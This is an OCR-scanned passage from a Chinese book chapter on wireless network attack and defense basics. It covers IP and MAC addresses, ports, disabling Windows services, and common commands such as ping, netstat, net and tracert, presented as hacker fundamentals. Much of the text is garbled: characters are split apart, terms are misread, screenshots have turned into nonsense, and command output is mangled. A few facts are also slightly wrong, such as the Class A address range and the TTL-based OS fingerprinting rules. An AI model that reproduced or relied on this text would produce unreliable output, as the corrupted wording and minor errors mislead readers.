术 提 高 了 SNR， 因 此 802.11a/g 的 网 络 最 大 吞 
吐 量 54Mb/s 范 围 有 所 扩大 。 同 时 802.11n 的 
网 络 性 在 802.11a/g 终 端 和 802.11n 终 端 混 合 
接 入 时 ， 网 络 整体 吞吐 量 较 纯 802.11n 终 端 
接 入 有 一 定 的 下 降 ， 此 时 802.11n 终 端的 速 
率 还 是 高 于 802.11a/g 的 终端 性 能 。 


5. MIMO 技 术 


MIMO 是 802.11n 物 理 层 的 核心 ， 通 过 
结合 40MHz 绑 定 、MIMO-OFDM 等 多 项 技 
术 ， 可 以 将 物理 层 速率 提高 到 600Mb/s。 为 
了 充分 发 挥 物理 层 的 能 力 ，802.11n 对 MAC 
层 采 用 了 帧 聚合 、Block ACK 等 多 项 技术 进 
行 优化 。802.11n 带 来 大 吞吐 、 广 覆盖 等 提 
高 的 同时 ， 也 增加 了 更 多 的 技术 挑战 。 了 
解 这 些 技术 ， 将 有 助 于 更 好 地 应 用 802.1ln 
和 解决 应 用 所 面临 的 实际 问题 。 


2.3” ”IP 地 址 
在 无 线 网 络 中 ， 一 台 主机 对 应 一 个 IP 


地 址 ， 因 此 ， 黑 客 要 想 攻 击 某 台 主机 ， 只 
须 找到 这 台 主 机 的 耳 地 址 ， 然 后 进行 入 侵 攻 
击 即 可 ， 可 以 说 耳 地 址 是 黑客 实施 入 侵 攻击 
的 “门牌 号 ”。 


2.3.1 认识 IP 地 址 


IP 地 址 用 于 在 TCP/IP 通 信 协 议 中 标 
记 每 台 计算 机 的 地 址 ， 通 常 使 用 十 进 制 
来 表示 ， 如 192.168.1.100， 但 在 计算 机 内 
部 ，IP 地 址 是 一 个 32 位 的 二 进 制 数值 ， 
如 11000000 10101000 00000001 00000110 
(192.168.1.6) 。 
一 个 完整 的 IP 地 址 由 两 部 分 组 成 ， 分 
别 是 网 络 号 和 主机 号 。 网 络 号 表示 其 所 属 
的 网 络 段 编号 ， 主 机 号 则 表示 该 网 段 中 该 
主机 的 地 址 编号 。 
按照 网 络 规模 的 大 小 ，IP 地 址 可 以 分 
为 A、B、C、D、E 五 类 ， 其 中 A、B、C 类 
是 三 种 主要 的 类 型 地 址 ，D 类 专 供 多 目 传送 
用 的 多 目地 址 ，E 类 用 于 扩展 备用 地 址 。 
e A 类 IP 地 址 。 一 个 A 类 IP 地 址 由 1 
字 节 的 网 络 地 址 和 3 字 节 主机 地 
址 组 成 ， 网 络 地 址 的 最 高 位 必须 
是 “0”， 地 址 范围 从 1.0.0.0 到 


126.0.0.0。 
e。 B 类 IP 地 址 。 一 个 B 类 IP 地 址 由 2 字 
节 的 网 络 地 址 和 2 字 节 的 主机 地 址 


组 成 ， 网 络 地 址 的 最 高 位 必须 是 
“10”， 地 址 范围 从 128.0.0.0 到 
191.255.255.255。 

e C 类 IP 地 址 。 一 个 C 类 IP 地 址 由 3 字 
节 的 网 络 地 址 和 1 字 节 的 主机 地 址 
组 成 ， 网 络 地 址 的 最 高 位 必须 是 
“110”。 地 址 范围 从 192.0.0.0 到 
223.255.255.255。 

e 了 D 类 IP 地 址 第 一 个 字 节 以 “1110” 开 
始 ， 它 是 一 个 专门 保留 的 地 址 。 它 
并 不 指向 特定 的 网 络 ， 目 前 这 一 类 
地 址 被 用 在 多 点 广播 (Multicast) 
中 。 多 点 广播 地 址 用 来 一 次 寻 址 一 


组 计算 机 ， 它 标识 共享 同一 协议 的 
一 组 计算 机 。 
e@ FE 类 IP 地 址 。 以 “11110” 开 始 ， 为 将 
来 使 用 保留 ， 全 零 (“0.0.0.0”) 
地 址 对 应 于 当前 主机 ; 全 “1” 的 人 P 
地 址 (“255.255.255.255”) 是 当 
前 子 网 的 广播 地 址 。 
具体 来 讲 ， 一 个 完整 的 IP 地 址 信息 应 
该 包括 人 P 地 址 、 子 网 掩 码 、 默 认 网 关 和 DNS 
等 4 部 分 。 只 有 这 4 部 分 协同 工作 ， 才 能 与 
互联 网 中 的 计算 机 相互 访问 。 
e 子 网 掩 码 : 子 网 掩 码 是 与 IP 地址 结 
合 使 用 的 一 种 技术 。 主 要 作用 有 两 
个 : 一 是 用 于 确定 IP 地 址 中 的 网 络 
号 和 主机 号 ， 二 是 用 于 将 一 个 大 的 
JP 网 络 划 分 为 若干 小 的 子 网 络 。 
e 默认 网 关 : 默认 网 关 意 为 一 台 主 机 
如 果 找 不 到 可 用 的 网 关 ， 就 把 数据 
包 发 送 给 默认 指定 的 网 关 ， 由 这 个 
网 关 来 处 理 数据 包 。 
e DNS: DNS 服 务 用 于 将 用 户 的 域名 
请 求 转换 为 PP 地址 。 


2.3.2 ”查看 IP 地 址 


计算 机 的 IP 地 址 一 旦 被 分 配 ， 可 以 说 
是 固定 不 变 的 ， 因 此 ， 查 询 出 无 线 网 络 中 
计算 机 或 终端 设备 的 耳 地 址 ， 在 一 定 程度 上 
就 完成 了 黑客 入 侵 的 前 提 工 作 。 使 用 ipcon- 
fig 命 令 可 以 探知 无 线 网 络 中 计算 机 或 终端 
设备 下 地 址 和 物理 地 址 。 

下 面 以 探知 无 线 网 络 中 计算 机 的 IP 地 
址 为 例 ， 来 介绍 查看 站 地址 的 操作 步骤 。 
ESep 园 右 击 “ 开 始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”菜单 命令 ， 如 下 图 所 示 。 


众 幸 (S) 


运行 (R) 从 


关机 或 注销 (U) 


桌面 (D) 


< 
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[step 图 打开 “运行 ”对 话 框 ， 在 “打开 ” 输 
入 框 中 输入 cmd 命 令 ， 如 下 图 所 示 。 


到 运行 x 


7 如。 Wndows 要 人 WE 入 的 名 乏 ,为 你 打开 可 应 的 程序. 
文件 突 、 文 柱 或 Internet 资源 . 


打开 (ok: |cmd 


浏览 (8)… 


[Sep 国 单 去 “确定 ”按钮 ， 打 开 “ 命 令 提示 
符 ” 窗 口 ， 在 “命令 提示 符 ” 窗 口中 输入 
ipconfig， 按 Enter 键 ， 即 可 显示 出 本 机 的 IP 
信息 ， 如 下 图 所 示 。 


i 


C:\Users\Adninistrator> 


侈 提示 : 在 “命令 提示 符 ” 窗 口中 ， 
192.168.0.102 表 示 本 机 在 无 线 局 域 网 中 的 JP 加 
地 址 。 和 


2.4 MAC 地 址 


MAC 地 址 就 是 在 媒体 接 入 层 上 使 用 
的 地 址 ， 也 叫 物理 地 址 、 硬 件 地 址 或 链 路 
地 址 ， 由 网 络 设备 制造 商 生产 时 写 在 硬件 
内 部 。 


2.4.1 认识 MAC 地 址 


MAC 地 址 与 网 络 无 关 ， 即 无 论 将 带 首 
有 这 个 地 址 的 硬件 〈 如 网 卡 、 集 线 器 、 路 
由 器 等 ) 接 入 到 网 络 的 何 处 ， 都 是 相同 的 
MAC 地 址 ， 它 由 厂商 写 在 网 卡 的 BIOS 里 。 

MAC 地 址 通常 表示 为 12 个 十 六 进 制 
数 ， 每 2 个 十 六 进 制 数 之 间 用 冒号 隔 开 ， 
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如 : 08:00:20:0A:8C:6D 就 是 一 个 MAC 地 
址 ， 其 中 前 6 位 十 六 进 制 数 08:00:20 代 表 网 
络 硬 件 制造 商 的 编号 ， 它 由 IEEE 分 配 ， 而 
后 3 位 十 六 进 制 数 0A:8C:6D 代 表 该 制造 商 所 
制造 的 某 个 网 络 产品 〈 如 网 卡 ) 的 系列 号 。 

每 个 网 络 制造 商 必须 确保 它 所 制造 的 
每 个 以 太 网 设备 都 具有 相同 的 前 三 个 字 
节 以 及 不 同 的 后 三 个 字 节 。 这 样 ， 就 可 保 
证 世界 上 每 个 以 太 网 设备 都 具有 唯一 的 
出 MAC 地 址 。 


Ce 


IP 地 址 与 MAC 地 址 的 区 别 在 于 : IP 
地 址 基于 逻辑 ， 比 较 灵 活 ， 不 受 硬件 限 
制 ， 也 容易 记忆 。MAC 地 址 在 一 定 程度 
上 与 硬件 一 致 ， 基 于 物理 ， 能 够 标识 具 
体 。 这 两 种 地 址 各 有 好 处 ， 使 用 时 也 因 
条 件 而 采取 不 同 的 地 址 。 


加 ye 


2.4.2 ”查看 MAC 地 址 


: 如 果 在 “命令 提示 符 ” 窗 口中 输入 ip- 

config /all 命 令 ， 然 后 按 Enter 键 ， 可 以 在 显 
出 的 结果 中 看 到 一 个 物理 地 址 : 6C-0B-84- 
3E-F7-AB， 这 个 就 是 用 户 自己 的 计算 机 的 
网 卡 地 址 ， 它 是 唯一 的 ， 如 下 图 所 示 。 


得 
Tie mor 


。; 媒体 已 断 开 连 挤 


TOPIP 上 的 NetBI05 .......: 避 


Frvsers\ 


2.5 ”什么 是 端口 


计算 机 与 外 界 通信 交流 的 出 口 可 以 认 
为 是 端口 。 一 个 IP 地 址 的 端口 可 以 有 65536 
( 即 256X256) 个 ， 端 口 是 通过 端口 号 来 
标记 的 ， 端 口号 只 有 整数 ， 范 围 是 从 0 到 
65535 (256X256-1) 。 

2.5.1 ”认识 端口 

端口 ， 英 文 是 port。 在 计算 机 领域 中 ， 
端口 可 以 认为 是 计算 机 与 外 界 通信 交流 的 
出 口 。 计 算 机 领域 又 可 分 为 硬件 领域 和 软 
件 领域 ， 在 硬件 领域 中 ， 端 口 又 被 称 作 接 
口 ， 如 常见 的 USB 端 口 、 网 卡 接口 、 串 行 端 
口 等 ; 在 软件 领域 中 ， 端 口 一 般 是 指 网 络 中 
面向 连接 服务 和 无 连接 服务 的 通信 协议 端 
口 ， 是 一 种 抽象 的 软件 结构 ， 包 括 一 些 数据 
结构 和 IO (基本 输入 输出 缓冲 区 。 


在 网 络 技术 中 ， 端 口 又 有 好 几 种 意 
思 ， 一 种 是 物理 意义 上 的 端口 ， 如 集 线 
器 、 交 换 机 、 路 由 器 等 连接 设备 用 于 连接 
其 他 的 网 络 设备 的 接口 ， 常 见 的 有 RJ-45 端 
口 、Serial 端 口 等 ， 另 一 种 是 逻辑 意义 上 的 
端口 ， 一 般 指 TCP/IP 协 议 中 的 端口 ， 范 围 
从 0 到 65535 (256X256-1) 。 


2.5.2 ”查看 系统 的 开放 端口 


经 常 查 看 系统 开放 端口 的 状态 变化 ， 
可 以 帮助 计算 机 用 户 及 时 提高 系统 安全 ， 


防范 黑客 通过 端口 入 侵 计 算 机 ， 用 户 可 以 

使 用 netstat 命 令 查看 自己 系统 端口 的 状态 。 
具体 操作 步骤 如 下 。 

[step 图 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 

入 netstat -a -n 命 令 ， 如 下 图 所 示 。 


ti crosoft Windows [hR 本 10.0. 17763. 104] 


(c) 2018 旺 crosoft Corporation。 保 留 所 有 权利 。 


:AUsersVAdministrator>netstat -a -ne 


step 图 按 Enter 键 ， 即 可 看 到 以 数字 显示 的 
TCP 和 UCP 连 接 的 端口 号 及 其 状态 ， 如 下 图 
所 示 。 


3 Windows 滁 10, 0, 17763。 和 
[ 


(ce) 2018 ierosoft Corporaticne 傈 留 久 有 权利 。 


:NUsersNAdministratorynetstat -a -n 


活动 连接 
协议 外 部 地 址 状态 
TCP 0. 0. 0: 
TCP 
TCP 
TICP 
Tp 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 、. 
UP 中 
UDP 和 
UDP 二 
TDP 本 
TDP 二 
UDP :和 
UDP 二 
UDP i 
UP a 
UP 只 
UDP 中 小 
TDP :和 
TDP 并 
UDP 刘 : 


2.5.3 ”关闭 不 必要 的 端口 


默认 情况 下 ， 计 算 机 系统 中 有 很 多 没 
用 或 不 安全 的 端口 是 开启 的 ， 这 些 端口 很 
容易 被 黑客 利用 ， 为 保障 系统 的 安全 ， 可 
以 将 这 些 不 用 的 端口 关闭 。 关 闭 端口 的 方 
式 有 多 种 ， 这 里 介绍 通过 关闭 无 用 服务 的 
方式 来 关闭 不 必要 的 端口 。 

下 面 以 关闭 Remote Desktop Help Ses- 
sion Manager (Windows 远 程 协助 服务 ) 为 
例 进 行 介绍 ， 具 体操 作 步 又 如 下 。 
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[B56 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “控制 面板 ”菜单 命令 ， 如 下 图 
所 示 。 


管理 器 (D 


控制 面板 (P) 从 


源 管 理 露 (E) 


搜索 (S) 


[Eee 图 打开 “控制 面板 ”窗口 ， 双 击 “ 管 理 
工具 ”图 标 ， 如 下 图 所 示 。 
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[es 图 打开 “管理 工具 ”窗口 ， 双 击 “ 服 
务 ” 图 标 ， 如 下 图 所 示 。 
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step 轩 打开 “服务 ”窗口 ， 找 到 Branch 
Cache 服 务 项 ， 如 下 图 所 示 。 
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[se 图 双击 Branch Cache 服 务 项 ， 弹 出 
“Branch Cache 的 属性 ”对 话 框 ， 在 “启动 
类 型 ”下 拉 列 表 框 中 选择 “禁用 ”选项 ， 
然后 单 击 “ 确 定 ” 按 钮 ， 禁 用 Branch Cache 
服务 项 的 端口 ， 如 下 图 所 示 。 


BranchCache 的 属性 (本 地 计算 机 ) X 


利 规 本 录 恢复 。 依存 关系 


服务 名 称 : PeerDistSve 

时 未 名 各 BranchCache 

指 述 : 此 服务 寻 和 来 和 本 地 子 同上 对 等 方 的 网 各 内容. 

可 执行 文件 的 路 径 : 

CAWINDOWS\System32\svchost.exe -k PeerDist 

启动 % 型 (E: 。 手动 ~ 
ESD) 
自动 
手动 

服务 状态 : 

Bah(S) 何止 中 Di) 才 信 人 R) 


妆 从 此 处 启动 服务 时 ， 你 可 指定 着 适用 的 启动 参数 


启动 参数 (M): [| 
EE 应 用 WA 
2.5.4 ”启动 需要 开启 的 端口 


. 开启 端口 的 操作 与 关闭 端口 的 方法 类 
似 ， 下 面具 体 介 绍 通过 启动 服务 方式 开启 
端口 的 具体 操作 步骤 。 
[step 国 这 里 以 上 述 关 闭 的 Branch Cache 服 务 
端口 为 例 。 在 “Branch Cache 的 属性 ”对 话 
框 中 单 击 “ 启 动 类 型 ” 右 侧 的 下 拉 按 钮 ， 
在 弹出 的 下 拉 菜 单 中 选择 “自动 ”选项 ， 
如 下 图 所 示 。 
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BranchCache 的 层 性 (本 地 计算 机 ) | 


号 规 ”本 好 恢复 。 依 育 关系 


县 务 名 称 : PeerDistSve 

时 地 2 条 BranchCache 

: 此 服务 溉 存 来生 本 地 子 同上 对 等 方 的 网 络 内 容 。 
本 执行 文件 的 路 径 : 


CAWINDOWS\System32\svchostexe -k PeerDist 


GE] 加 
豆 动 (延迟 言 动 ) 
手动 
禁用 
服务 状态 : PT 
ES 停 上 中 署 停 站 居 复 IN) 
关 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 , 


Bp 图 单 击 “应 用 ”按钮 ， 激 活 “ 启 动 ” 按 
钮 ， 如 下 图 所 示 。 


BranchCache 的 属性 (本 地 计算 机 ) x 


第 规 。 登录 。 恢复 。 依 请 关系 


服务 名称 : PeerDistSvd 
显示 名 称 : BranchCache 
到: 此 服务 淖 和 来 得 术 地 子 网 上 对 等 方 的 网 络 内 容 . 
可 执行 文人 的 中 和 : 
CAWINDOWS\System32\svchost.exe -k PeerDist 
局 动 闪 有 (日 号 动 ~ 
服务 状态 : Bm 
启动 (S) 停止 暂停 Im) 休 各 内 


关 从 此 处 启动 吝 务 对， 你 可 措 定 所 适用 的 启动 参数 - 


启动 参数 (M); 


[step 图 单 去 “启动 ”按钮 ， 即 可 启动 Branch 
Cache 服 务 ， 再 次 单 击 “ 应 用 ”按钮 ， 在 
“Branch Cache 的 属性 ”对 话 框 中 可 以 看 到 
该 服务 的 “服务 状态 ”已 经 变 为 “正在 运 
行 ”， 如 下 图 所 示 。 


应 才 (A] 


BranchCache 的 属性 (本 地 计算 机 } x 


第 规 。 登录 全 复 。 依存 关系 


服务 名 称 : PeerDistSvd 
显示 名 称 : BranchCache 
演示 此 服务 烧 存 来 全 本 地 子 网 上 对 等 方 的 网 阁 内 容 . 
可 执行 文件 的 路 径 ; 
CAWINDOWS\System32\svchost.exe -k PeerDist 
启动 类型 (E): 生动 
服务 状态 ; 正在 运行 
语 动 (5) 停 上 上 0m) 曾 入 [P 你 复职 


当 从 此 处 局 动 服 务 时 ， 你 可 揪 定 所 适用 的 启动 参数 . 


启动 参数 (M): [ 


Cw Cw 


[step 园 单 击 “ 确 定 ” 按 钮 ， 返回 到 “服务 ” 

窗口 之 中 ， 此 时 即 可 发 现 Branch Cache 服 务 
的 “启用 类 型 ”被 设置 为 “正在 运行 ”。 

这 样 就 可 以 成 功 开 启 Branch Cache 服 务 对 应 
的 端口 ， 如 下 图 所 示 。 


CTT ED 
J 


2.6 ”黑客 常用 的 DOS 命 令 


熟练 掌握 一 些 DOS 命 令 是 一 名 黑客 
的 基本 功 ， 下 面 就 来 介绍 一 些 黑客 常用 的 
DOS 命 令 ， 了 解 这 样 命令 可 以 帮助 用 户 
追踪 黑客 的 踪迹 ， 提 高 个 人 电子 设备 的 
安全 。 


第 2 章 无 线 网 络 攻防 必 备 知识 


2.6.1 


cd 命令 


cd (change directory) 命令 的 作用 是 改 


变 当前 目录 ， 该 命令 被 用 于 切换 路 径 目录 。 
cd 命令 主要 有 以 下 三 种 使 用 方法 : 

e cd path: path 是 路 径 ， 例 如 输入 cd 
ci\ 命 令 和 cd Windows 命 令 即 可 分 别 
切换 到 Ci\ 和 C:\Windows 目录 下 。 

e cd..: cd 后 面 的 两 个 “.” 表 示 返 回 到 
上 一 级 目录 ， 例 如 当前 的 目录 为 C:\ 
Windows， 如 果 输 入 cd.. 命 令 ， 按 Enter 
键 即 可 返回 到 上 一 级 目录 ， 即 C:。 

。 cd\: 表示 当前 无 论 在 哪个 子 级 目 
录 下 ， 通 过 该 命令 立即 返回 到 根 目 
录 下 。 

下 面 将 介绍 使 用 cd 命令 进入 C:\Win- 
dows\system32 子 目录 ， 并 退回 根 目录 的 具 
体操 作 步 又 。 

[step 图 在 “命令 提示 符 ” 窗 口中 输入 cd ci\ 命 
令 ， 按 Enter 键 ， 即 可 将 目录 切换 为 C\， 如 
下 图 所 示 。 


10. 0. 17763. 104. ~ 


icrosoft Windows 
(c) 2018 crosoft Corporation。 保 留 所 有 权利 。 


:\Users\Administrator>cd c:\ 


:\> 


[step 图 如 果 想 进入 C:\Windows\system32 目 录 
中 ， 则 需 在 上 图 的 “命令 提示 符 ” 窗 口中 
输入 cd Windows\system32 命 令 ， 按 Enter 键 
即 可 将 目录 切换 为 C:\Windows\system32， 
如 下 图 所 示 。 


10. 0. 17763. 104] 


icrosoft Windows [| 


(c) 2018 了 crosoft Corporation。 保 留 所 有 权利 。 


:MUsersVAdministrator>cd c:\ 
:Ved Vindows\system32 


:\Vindows\System32>, 
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[step 图 如 果 想 返回 到 上 一 级 目录 中 ， ne 
在 “命令 提示 符 ” 窗 口中 输入 cd.. 命 令 
Enter 键 即 可 返回 到 上 一 级 目录 下 ， 
所 示 。 


腿 本 10.0. WE 电池 A 


Microsoft Windows 
(c) 2018 Microsoft Corporatione 


所 有 权利 。 
:AMUsersNAdministrator>cd c:\ 

ec:\>cd Windows\system32 
: \Windows\System32>cd .. 


:Windows>~ 


[tsp 图 如 果 想 返回 到 根 目 录 ， 则 可 以 在 “ 命 
令 提 示 符 ”窗口 中 输入 cd\ 命 令 ， 按 Enter 键 
即 可 返回 到 根 目 录 下 ， 如 下 图 所 示 。 


10. 0. 17763. 104. ^ 
留 所 有 权利 。 


icrosoft Windows 
(c) 2018 Microsoft Corporation。 


:AUsersNAdministrator>cd c:\ 
:Ved Windows\system32 
:Windows\System32>cd .. 
:Windows>cd \ 

:Vs 


2.6.2 dir 命令 


dir 命 令 的 作用 是 列 出 磁盘 上 所 有 的 或 
指定 的 文件 目录 ， 可 以 显示 的 内 容 包含 卷 
标 、 文 件 名 、 文 件 大 小 、 文 件 建立 日 期 和 
时 间 、 目 录 名 、 磁 盘 剩 余 空间 等 。 

dir 命 令 的 格式 如 下 : 

dir [ 盘 符 ] [路 径 ] [文件 名 ] [/p] [/w] [/a: 属 性 ] 

其 中 各 个 参数 的 作用 如 下 : 

e p: 当 显 示 的 信息 超过 一 屏 时 暂停 显 
示 ， 直 至 按 任意 键 才 继 续 显示 ; 

e /w: 以 横向 排列 的 形式 显示 文件 名 
和 目录 名 ， 每 行 5 个 (不 显示 文件 大 
小 、 建 立 日 期 和 时 间 ) ; 

e /a( 属 性 ) : 仅 显 示 指 定 属 性 的 文 
件 ， 无 此 参数 时 ，DIR 显 示 除 系统 
和 隐 含 文件 外 的 所 有 文件 。 可 指定 
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为 以 下 几 种 形式 : 

: 显示 系统 文件 的 信息 。 
: 显示 隐 含 文件 的 信息 。 
显示 只 读 文 件 的 信息 。 
显示 归档 文件 的 信息 。 
显示 目录 信息 。 


/ar: 
/aa: 
/ad: 


下 面 将 介绍 在 “命令 提示 符 ” 窗 口中 
使 用 di 命令 查看 磁盘 中 的 资源 的 具体 操作 
步骤 。 

[sep 国 在 “命令 提示 符 ” 窗 口中 输入 dir 命 
令 ， 按 Enter 键 ， 即 可 查看 当前 目录 下 的 资 
源 列 表 ， 如 下 图 所 示 。 


andrcid 
~ Androidstuciod. 2 


ea 
tu 
Sansung Galaxy lote -41.1- AP1 


Saved Ganes 


FC:\sers\Adninistrator>. 


在 “命令 提示 符 ” 窗 口中 输入 dir e:/ 
a:d 命 令 ， 按 Enter 键 ， 即 可 查看 E 盘 下 的 所 
有 文件 的 目录 ， 如 下 图 所 示 。 


F:AUsersvhdninistrator> 


step 图 在 “命令 提示 符 ” 窗 口 输入 dir 
ci\windows /a:h 命 令 ， 按 Enter 键 即 可 列 出 ci\ 


windows 目 录 下 的 隐藏 文件 ， 如 下 图 所 示 。 


Nicrosoft 有 ndows 10. 0. 17753 104] Ey 
Lc) 2018 Kicrosoft Corparation。 保 留 所 有 权利 


Cs Vsers\t i 
| 可 CCMC-C901 
=:Viinaoys 的 目录 

名 佑 全 塌 = 检 11: 柏 


加 1970171 年 06:59 
15 年 中 :四 


eVWindows /ash 


BitLockerDiscoveryYoluneContents 
Lstal 
nee Cree 


但 S 
二 13, 31 
人 


2.6.3 ”ping 命 令 


ping 命 令 是 TCP/IP 协 议 中 最 为 常用 的 
命令 之 一 ， 主 要 用 来 检查 网 络 是 否 通畅 或 
者 网 络 连接 的 速度 ， 作 为 一 个 黑客 来 说 ， 
ping 命 令 是 第 一 个 必须 掌握 的 DOS 命 令 。 在 
“命令 提示 符 ” 窗 口中 输入 ping /?， 可 以 得 
到 这 条 命令 的 帮助 信息 。 


10. 0 17763. 104] A 


icrosoft Windows 
《ec) 2018 了 crosoft Corpcration。 保留 所 有 权利 。 


:NUsersVAanini strator>ping /? 


法 : ping [-t] [-a] [-n count] [-1 sizs] [-1] [-i TTL] [-v TOS] 
-Pr count] [-s count] [[-j hosr-list] | [-k host-list]] 
[wy shee [-R] [-S srcaddr] [-c comparrment] [-p] 
4] [0] Target_nane 


选项 : 
强 i Es. 请 畦 入 Ctrlsereakt 
bh 全 CrrltC， 
ut i 
3 sse 大 小。 
要 2 标记 (人 运用 于 po) 
革 
~» TOS 服务 闪 型 ( 仅 适用 于 IPy4。 该 设置 已 补 弃 用 ， 
相间 要 E 竹 
i i IPyd)» 
EL 适用 于 _IPv4) 。 
了 ES RN IF。 
3 ganr TPve。 
oe 
下 4 
加 人 提供 得 6 直 。 


C:\Users\Adninistrator> 


使 用 ping 命 令 对 计算 机 的 连接 状态 进行 
测试 的 具体 操作 步骤 如 下 。 

[steep 回 使 用 ping 命 令 来 判断 计算 机 的 操作 
系统 类 型 。 在 “命令 提示 符 ” 窗 口中 输 
入 “192.168.0.1” 命 令 ， 右 上 图 为 其 运行 
结果 。 


< 
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oft Vindowe 10.0. 17763. 10 困 
18 Ji crosoft Corporation。 保留 所 有 权利 。 


FE:AUsarsAdnini strator>ping 192. 168.0 1 
Ping 192. 168， 吕 具有 强 闻 节 [ 


0 1 铸 : 开 广 
! 琉 才 人 a Ee 


192.168.0.1 -t -1 128 命 令 
主机 发 出 大 量 的 数据 包 ， 如 下 图 所 示 。 


0 10.0, 17763. 104] A 
soft Corporation。 保 贸 所 有 权利 - 


FP: \Users\AdninistratorYpine 192.168.0.1 -t -1 128 
108. 01 128 字 节 的 
| 这 字 由 据 : 


:所 EH 


Klns Ty: 


=Ins TI 04 


3 
回回 回 回 训 回回 回回 司 ) 


判断 本 台 计 算 机 是 否 与 外 界 网 络 连 
通 。 在 “命令 提示 符 ” 窗 口中 输入 ping www. 


baidu.com 命 令 ， 下 图 为 其 运行 结果 ， 说 明 本 
台 计 算 机 与 外 界 网 络 连通 。 


10. 0. 17769. 104] A 
有 权利 。 


nistrator pine ww. beidu. com 


[a Windows 
Ko) 2018 Werosdtt Corporatione 


C:\sere\Acninistrator 


[Eee 四 解析 某 IP 地 址 的 计算 机 名 。 在 “ 命 
令 提 示 符 ”窗口 中 输入 ping -a 192.168.1. 
102 命 令 ， 下 图 为 其 运行 结果 ， 这 人 台 主 
机 的 名 称 为 “SC-201811151232.DHCP 
HOST” 。 
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0 


= 
Ca 


利用 TTL 值 判断 操作 系统 类 型 
由 于 不 同 的 操作 系统 的 主机 设置 的 
TTL 值 是 不 同 的 ， 所 以 可 以 根据 TTL 值 来 
识别 操作 系统 类 型 。 在 一 般 情况 下 : 
@ TTL=32 则 认为 目标 主机 操作 系统 为 


Windows 95/98。 
@ TTL=64-128 就 认为 主机 操作 系统 为 
Windows NT/2000/XP/7/10。 
@ TTL=128-255 或 者 32-64 就 认为 主机 
操作 系统 是 UNIX/Linux 操 作 系 统 。 
2.6.4。” net 命令 


E 使 用 net 命 令 可 以 查询 网 络 状 态 、 共 享 
资源 以 及 计算 机 所 开启 的 服务 等 ， 该 命令 
的 语法 格式 信息 如 下 : 
NET [ ACCOUNTS | COMPUTER | CONFIG | 
CONTINUE | FILE | GROUP | HELP | 
HELPMSG | LOCALGROUP | 
PAUSE | PRINT | SEND | SESSION | 
SHARE | START | STATISTICS | STOP 
| TIME | USE | USER | VIEW ] 
查询 本 台 计 算 机 开启 那些 Windows 服 务 
的 具体 操作 步骤 如 下 。 
step 国 使 用 net 命 令 查 看 网 络 状 态 
‘ 命令 提示 符 ” 窗 
start 命 令 


NAME | 


。 打 开 
"2 在 命令 行 下 输入 iiet 
， 如 下 图 所 示 。 


10. 0. 17783.104] ~ 
人 e) 2018 但 crosoft Corporation。 保留 所 有 权利 > 


JGcrosoft Windows [ 睛 


:\Users\Adninistratorner starte 


step 图 按 Enter 键 ， 则 可 以 在 打开 的 “命令 提 
示 符 ”窗口 中 显示 计算 机 所 启动 的 Windows 


24 


服务 ， 如 下 图 所 示 。 


63. 104] ~ 
mn。 保留 所 有 权利 。 


C:\Users\Admiristratcr>net start 


已 经 启动 以 下 Windows 服务 : 


AdaptiveSleepService 

AD External Events Utility 

AD FUEL Service 

Application Infornation 

AppX Deployment Service (AppXSYC) 
Background Tasks Infrastructure Service 
Base Filtering Ensine 

cbdhsyc_50bf2 

CDPUserSvc_50bf2 


(Ce) 2018 Wicrcsoft Corpor: 


Computer Browser 
Corelessaging 

Credential Manager 
Cryptographic Services 

DCOW Server Process Launcher 
Device Asscciation Service 


Flash Helper Service 
Function Discovery Provider Host 


2.6.5 ” netstat 命令 


netstat 命 令 主要 用 来 显示 网 络 连接 的 信 
息 ， 包 括 显示 活动 的 TCP 连 接 、 路 由 器 和 网 
络 接口 信息 ， 是 一 个 监控 TCP/IP 网 络 非常 
有 用 的 工具 ， 可 以 让 用 户 得 知 系统 中 目前 
都 有 哪些 网 络 连接 正常 。 

在 “命令 提示 符 ” 窗 口中 输入 netstat 
/?， 可 以 得 到 这 条 命令 的 帮助 信息 。 


wg 和 


该 命令 的 语法 格式 信息 如 下 : 


NETSTAT [=al] [=b] {=e) [=n] [=o] {=p 
proto], [=r) [=8] [=v] Uintervall] 


其 中 比较 重要 的 参数 含义 如 下 : 

e -a: 显示 所 有 连接 和 监听 端口 。 

e -n: 以 数字 形式 显示 地 址 和 端口 号 。 
使 用 netstat 命 令 查 看 网 络 连 接 的 具体 步 


又 如 下 。 

[step 图 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
入 netstat -或 netstat 命 令 ， 按 Enter 键 ， 即 可 查 
看 服务 器 活动 的 TCP/IP 连 接 ， 如 下 图 所 示 。 


10.0. 17763.104] ry 
8 microeoi Corporsiione 条 贸 六 有 权利 。 


:YUsersVAdninistratorynetstat 
活动 连接 
by 本 地 地 址 


[en 国 在 “命令 提示 符 ” 窗 


口中 输入 netstat 一 


I 命令 ， 按 Enter 键 ， 即 可 查看 本 机 路 由 信息 
内 容 ， 


如 下 图 所 示 。 


04] 
忆 有 人 有- 


Top -de Ma 
air Comerolser 
obast Latestace 下 


301 fe00;:/ 
人 


1 1 go 


让 


step 图 在 “命令 提示 符 ” 窗 口中 输入 netstat 一 
按 Enter 键 ， 即 可 查看 本 机 所 有 活动 
的 TCP/IP 连 接 ， 如 下 图 所 示 。 


TSTEMTNE 
LISTaMING 


2 168. 0. 143:189 
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step 园 在 “命令 提示 符 ” 窗 口中 输入 netstat 
nn -a 命令 ， 按 Enter 键 ， 即 可 显示 本 机 所 有 
连接 的 端口 及 其 状态 ， 如 下 图 所 示 。 


TTSTENIND 
LISTENINS 


2.6.6 tracert 命 令 


使 用 tracert 命 令 可 以 查看 网 络 中 路 由 占 
节点 信息 ， 最 常见 的 使 用 方法 是 在 tracert 命 
令 后 追加 一 个 参数 ， 表 示 检 测 和 查看 连接 
当前 主机 经 历 了 哪些 路 由 节点 ， 适 合用 于 
大 型 网 络 的 测试 ， 该 命令 的 语法 格式 信息 
如 下 : 


tracert 
Hostlist] 


其 中 各 个 参数 的 含义 如 下 : 
e -d: 防止 解析 目标 主机 的 名 字 ， 可 
以 加 速 显示 tracert 命 令 结果 。 
e -h MaximumHops: 指定 搜索 到 目标 
地 址 的 最 大 跳跃 数 ， 默 认 值 为 30 个 
